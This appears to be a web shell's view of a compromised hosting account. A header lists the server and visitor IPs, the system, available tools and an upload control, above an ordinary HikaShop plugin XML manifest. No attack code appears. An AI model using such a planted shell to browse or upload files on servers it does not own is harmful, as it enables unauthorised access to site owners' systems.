Done !
| Server IP : 46.105.57.169 / Your IP : 216.73.217.35 Web Server : Apache System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : verseaumee ( 152031) PHP Version : 8.5.7 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/verseaumee/zenit/plugins/system/hikashopregistrationredirect/ |
Upload File : |
<?xml version="1.0" encoding="utf-8"?> <extension type="plugin" version="2.5" method="upgrade" group="system"> <name>Hikashop Registration Redirect Plugin</name> <creationDate>29 avril 2022</creationDate> <version>4.5.1</version> <author>Hikashop</author> <authorEmail>dev@hikashop.com</authorEmail> <authorUrl>http://www.hikashop.com</authorUrl> <copyright>(C) 2010-2022 HIKARI SOFTWARE. All rights reserved.</copyright> <license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license> <description>This plugin enables you to handle redirect to HikaShop registration page</description> <files> <filename plugin="hikashopregistrationredirect">hikashopregistrationredirect.php</filename> </files> <params addpath="/components/com_hikashop/params"> <param name="item_id" type="text" size="5" default="" label="HIKA_ITEMID_FOR_REGISTRATION" description="ITEMID_FOR_REGISTRATION"/> </params> <config> <fields name="params" addfieldpath="/components/com_hikashop/fields"> <fieldset name="basic"> <field name="item_id" type="text" size="5" default="" label="HIKA_ITEMID_FOR_REGISTRATION" description="ITEMID_FOR_REGISTRATION"/> </fieldset> </fields> </config> </extension>